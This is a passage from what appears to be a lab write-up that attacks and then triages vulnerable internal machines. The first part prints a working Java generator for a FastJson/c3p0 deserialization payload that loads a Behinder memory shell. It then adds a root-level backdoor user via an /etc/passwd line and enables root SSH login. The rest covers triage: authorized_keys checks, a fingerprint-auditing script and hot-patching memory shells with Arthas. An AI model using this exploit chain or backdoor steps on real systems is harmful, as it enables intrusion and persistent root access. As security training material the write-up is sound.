                filterConfigs.put("AutomneGreet", filterConfig);
            }
        } catch (Exception var10) {
        }
    }
}
```
With the memory shell ready, combine it with the c3p0 chain to generate the JSON. The final exploit is as follows:
```java
import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;

public class Test {
    public static void main(String[] args) throws Exception {
        String hex2 = bytesToHex(tobyteArray(gen()));
        String FJ1247 = "{\n" +
                "    \"a\":{\n" +
                "        \"@type\":\"java.lang.Class\",\n" +
                "        \"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\n" +
                "    },\n" +
                "    \"b\":{\n" +
                "        \"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\n" +
                "        \"userOverridesAsString\":\"HexAsciiSerializedMap:" + hex2 + ";\",\n" +
                "    }\n" +
                "}\n";
        System.out.println(FJ1247);
    }

    // FastJson native deserialization loads the malicious class bytecode
    public static Object gen() throws Exception {
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        byte[] bytes = Files.readAllBytes(Paths.get("e:\\IceShell.class")); // path of the prepared Behinder shell class; just read its bytes
        setValue(templates, "_bytecodes", new byte[][]{bytes});
        setValue(templates, "_name", "1");
        setValue(templates, "_tfactory", null);
        JSONArray jsonArray = new JSONArray();
        jsonArray.add(templates);
        BadAttributeValueExpException bd = new BadAttributeValueExpException(null);
        setValue(bd, "val", jsonArray);
        HashMap hashMap = new HashMap();
        hashMap.put(templates, bd);
        return hashMap;
    }

    public static void setValue(Object obj, String name, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    // serialize the object into a byte array
    public static byte[] tobyteArray(Object o) throws IOException {
        ByteArrayOutputStream bao = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bao);
        oos.writeObject(o);
        return bao.toByteArray();
    }

    // byte array to hex
    public static String bytesToHex(byte[] bytes) {
        StringBuffer stringBuffer = new StringBuffer();
        for (int i = 0; i < bytes.length; i++) {
            String hex = Integer.toHexString(bytes[i] & 0xff); // Java bytes are signed (-128..127); & 0xff maps them to 0..255
            if (hex.length() < 2) {
                stringBuffer.append("0" + hex); // single hex digit: left-pad with '0' so every byte is two characters
            } else {
                stringBuffer.append(hex);
            }
        }
        return stringBuffer.toString();
    }
}
```
Running the exploit produces a JSON body like this:
```json
{
  "a":{
    "\u0040\u0074\u0079\u0070\u0065":"java.lang.Class",
    "val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
  },
  "b":{
    "\u0040\u0074\u0079\u0070\u0065":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
    "\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067":"HexAsciiSerializedMap:<hex payload omitted>;",
  }
}
```
Port 22 was found open earlier,
so again write a new user:
fwl:adk6oNRwypFwA:0:0:eval_to_root:/root:/bin/bash
Username fwl, password admin23.
Just edit the file in Behinder.
Still cannot connect at this point; root SSH login has to be permitted:
```bash
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
```
Restart:
```bash
/etc/init.d/ssh restart
```
Internal machine 03
Triage
Triage is honestly a bit of a grind.
As with the first two machines, first check for hidden users.
None.
Check for abnormal ports:
```bash
netstat -antlp | more
```
Check environment variables;
each directory is separated by ":".
Check for abnormal files or code.
None.
Check whether .ssh has been seeded with the attacker's key:
since the SSH service is enabled, if the intruder plants their own key in authorized_keys after the compromise, they can log in without a password.
```bash
cat ~/.ssh/authorized_keys
```
A backdoor key is present; delete it.
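Checking authorized_keys by eye, as above, scales badly once keys carry options (`command=`, `from=`) and long comments, and a line can also claim one key type while the blob encodes another. Added example, mine and not from the post: it parses each authorized_keys line including a quoted options prefix, verifies that the base64 blob really encodes the declared key type, computes the same SHA256 fingerprint that `ssh-keygen -lf` prints, and reports every key whose fingerprint is not on an allowlist. The key blobs are constructed (not real keys) and the allowlist is derived from them inline.

```python
import base64
import binascii
import hashlib
import re
import struct

KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")

# options (may contain quoted strings with spaces), key type, base64 blob, optional comment
LINE_RE = re.compile(
    r'^(?:(?P<opts>(?:[^\s"]|"[^"]*")+)\s+)?(?P<type>' + "|".join(map(re.escape, KEY_TYPES)) +
    r')\s+(?P<blob>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$'
)


def fingerprint(blob_b64):
    """SHA256 fingerprint in the form ssh-keygen prints: SHA256:<base64 without padding>."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def declared_type_matches(key_type, blob_b64):
    """The blob starts with a length-prefixed type string; it must equal the declared type."""
    try:
        raw = base64.b64decode(blob_b64, validate=True)
        (n,) = struct.unpack(">I", raw[:4])
        return raw[4:4 + n] == key_type.encode()
    except (binascii.Error, struct.error):
        return False


def parse_authorized_keys(text):
    """Return one dict per key line; unparsable lines are kept with 'error' set."""
    keys = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            keys.append({"line": lineno, "error": "unrecognised line"})
            continue
        entry = {"line": lineno, "options": m["opts"] or "", "type": m["type"],
                 "comment": m["comment"] or "", "error": None}
        if not declared_type_matches(m["type"], m["blob"]):
            entry["error"] = "blob does not encode the declared key type"
        else:
            entry["fingerprint"] = fingerprint(m["blob"])
        keys.append(entry)
    return keys


def audit(text, allowed_fingerprints):
    """Entries that are malformed or whose fingerprint is not on the allowlist."""
    return [k for k in parse_authorized_keys(text)
            if k["error"] or k["fingerprint"] not in allowed_fingerprints]


def make_blob(key_type, key_material):
    """Build a length-prefixed wire blob (used here only to construct sample keys)."""
    raw = (struct.pack(">I", len(key_type)) + key_type.encode()
           + struct.pack(">I", len(key_material)) + key_material)
    return base64.b64encode(raw).decode()


# Constructed keys: the admin's key and one a responder would not recognise.
ADMIN_BLOB = make_blob("ssh-ed25519", bytes(range(32)))
UNKNOWN_BLOB = make_blob("ssh-ed25519", bytes(range(32, 64)))
ALLOWED = {fingerprint(ADMIN_BLOB)}

SAMPLE_AUTHORIZED_KEYS = f"""\
# ops team
ssh-ed25519 {ADMIN_BLOB} ops@bastion
from="10.0.0.0/8",command="/usr/bin/backup run" ssh-ed25519 {UNKNOWN_BLOB} backup
ssh-rsa {UNKNOWN_BLOB} mislabelled
"""

if __name__ == "__main__":
    for k in audit(SAMPLE_AUTHORIZED_KEYS, ALLOWED):
        print(k)
```

The allowlist should be built from fingerprints recorded before the incident (for example the output of `ssh-keygen -lf` over the ops team's public keys); comparing fingerprints rather than whole lines means a key that was only re-commented or given new options is still recognised, while a new blob is always flagged.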
Continue triage.
ps -ef | grep java to view the running Java processes.
app.jar is found in the same location.
Download it.
This one can be decompiled; the earlier download over http.server must have been incomplete, so re-downloading from internal machine 02 later should work too.
Internal machine 02's works now as well.
Analyze 02's first.
Found a backdoor.
For now it can only be removed in memory.
Tool used: https://github.com/alibaba/arthas/releases
Recompile the UserController.class above,
strip out the malicious part, and prepare for a hot update.
Hot-updating the memory shell on the second machine
Upload the required tools to machine 02.
The second machine has no outbound access, so the tool must first be run somewhere else and the downloaded files copied over to this machine.
Pack with tar; the target has no unzip.
Upload to machine 02.
```bash
tar -cvf arthas.tar .arthas   # pack
tar -xvf arthas.tar           # unpack
```
Run again:
```bash
java -jar arthas-boot.jar
```
Hot-update the file:
```
retransform /hmoe/vulntarget/UserController.class
```
Another problem here: javac kept erroring and I could not compile UserController.java into UserController.class.
Leave that and do 03 first.
Likewise download app.jar
and decompile it.
Can't manage it; headache.
![image-20240411003518240](https://img-blog.csdnimg.cn/img_convert/ecfabd91e395ab1b409bc31c079b7767.png)
Download to local.
Scan it directly with D盾 (D-Shield).
Backdoor 1:
exec was found in ShellServlet.java
Backdoor.
Backdoor 2.
Hot fix of the 03 memory shell
Class file paths:
```
retransform /home/vulntarget/.copagent/class/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl$TransletClassLoader-4d432b55/ShellServlet.class
retransform /home/vulntarget/.copagent/class/org.springframework.boot.loader.LaunchedURLClassLoader-49c2faae/javax/servlet/http/HttpServlet.class
```
Machine 02, which wasn't finished earlier, was also handled with this method.
Hot fix:
```
retransform /root/.copagent/class/org.springframework.boot.loader.LaunchedURLClassLoader-21b8d17c/com/example/shiro550/controller/UserController.class
```
Summary
For the later memory-shell auditing, parts of the analysis are still unclear to me.
Keep learning.